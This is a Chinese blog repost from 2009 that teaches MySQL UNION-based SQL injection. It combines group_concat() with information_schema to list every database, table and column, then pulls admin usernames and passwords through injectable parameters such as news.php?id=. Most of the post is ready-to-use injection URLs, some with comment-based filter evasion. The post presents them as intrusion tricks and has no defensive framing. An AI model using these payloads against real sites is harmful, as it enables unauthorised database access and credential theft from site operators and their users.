http://hacklu.net/blog/index.php zh-cn http://hacklu.net/blog/post/773/ 樱花浪子 <> Wed, 10 Jun 2009 04:14:30 +0000 http://hacklu.net/blog/post/773/
作者：晓华 [岁月联盟信息安全团队 www.Syue.com]

工具下载地址：http://bbs.syue.com/viewthread.php?tid=30767

开篇介绍
在FLYH4T大哥的“Mysql5注射技巧总结”一文中介绍了通过使用“information_schema”库实现遍历猜解库名表名以及字段名的技术，解决了一些以前使用工具无法猜解到的库名表名以及字段名的问题，提高了注射的效率。关于此文的详细技术细节请参考往期的“黑客手册”。但是通过我的研究，发现这种技巧有一定的缺陷。首先遍历的库名或者表名以及字段名等位置，要使用到limit功能语句来强制返回select查询的记录数。如果在渗透中limit功能语句无法使用，是不是很难进行遍历了？如果被限制的话，可以使用“!=”来绕过。语句使用格式：

show.php?id=2/**/and/**/1=2/**/union/**/select/**/1,table_name,3,4,5,6,7,8,9,10/**/frominformation_schema.tables/**/where/**/table_schema=database()/**/and/**/table_name/**/!=char(97,100,109,105,110)

虽然这样能够绕过limit的限制，但是利用起来非常不方便，而且猜解的速度很慢。经过我的仔细研究，找到了一个相对比较好的方法。而且解决了limit被限制的问题，更重要的是加速了遍历的速度，明显提高注射的效率。

group_concat()函数介绍

首先我们来了解一下group_concat()函数，该函数完整语法如下：
GROUP_CONCAT([DISTINCT] expr [,expr ...]
[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] [,col ...]]
[SEPARATOR str_val])
该函数返回一个字符串结果，该结果由分组中的值连接组合而成，这个函数在 MySQL 4.1 中被加入。有兴趣的朋友可以参考“MYSQL5.1参考手册” 。

普通利用

该函数在MYSQL的注射中也有使用的例子，利用方法还只是局限于在一个地方显示一些普通信息，比如显示数据库版本和爆字段数据等。爆版本等信息，执行语句：
news.php?category=seminar&id=-291/**/union/**/select/**/1,group_concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15—如图1

1.jpg
1 小时前


爆用户名以及密码等字段信息，执行语句：
news.php?id=-1/**/union/**/select/**/1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12/**/from/**/admin—
这么强悍的函数，我们为什么不深度挖掘它的功能呢？利用它可以干一些不可思议的事，接下来我会介绍如何深度利用这个函数，读者朋友可要仔细了。

高级利用
爆全部库名
利用这个函数可以爆出全部的数据库名，构造查询语句：
news.php?category=seminar&id=-291/**/union/**/select/**/1,group_concat(SCHEMA_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.SCHEMATA--   如图2

2.jpg
1 小时前


爆出了所有的数据库名，共有三个。依次为： information_schema cite test

爆全部表名

利用这个函数可以爆出全部的表名，如果想爆出cite库的全部表名。构造查询语句：
news.php?category=seminar&id=-291/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.tables/**/where/**/table_schema=0x63697465 其中0x63697465是cite的HEX值。如图3

3.jpg
1 小时前


如果只是想爆当前库的全部表名，我们不需要将库名进行HEX值转换。可以这样执行语句：
news.php?category=seminar&id=-291/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15/** /from/**/information_schema.tables/**/where/** /table_schema=database()--  其中database()函数就是显示当前库的信息。如图4

4.jpg
1 小时前


爆全部字段名

利用这个函数可以爆出全部的字段名，如果想爆出“account”表的全部字段，首先将其进行HEX转换。构造查询语句：
news.php?category=seminar&id=-291/**/union/**/select/**/1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.columns/**/where/**/table_name=0x6163636F756E74-- 如图5

5.jpg
1 小时前


得到二个敏感的字段，依次为：username password。

爆最终敏感数据

有了表和字段等关键信息，我们就可以爆出敏感数据信息。构造查询语句：
news.php?category=seminar&id=-291/**/union/**/select/**/1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/cite.account--  如图6

6.jpg
1 小时前


总结：灵活运用此函数，能让你充分感受到MYSQL注射的快感。其实也不是什么高深的技术，只不过是将MYSQL5的“information_schema”库与group_concat()函数的综合运用罢了。对本文有任何疑问和有好的建议的朋友，请到黑客手册官方论坛或者岁月联盟找我交换意见，谢谢。 ]]> http://hacklu.net/blog/post/773/#blogcomment1757 6589394 <6589394@qq.com> Mon, 13 Jul 2009 22:53:01 +0000 http://hacklu.net/blog/post/773/#blogcomment1757 lost.cq.cn
浪子原创在哪，我去看看图片 ]]>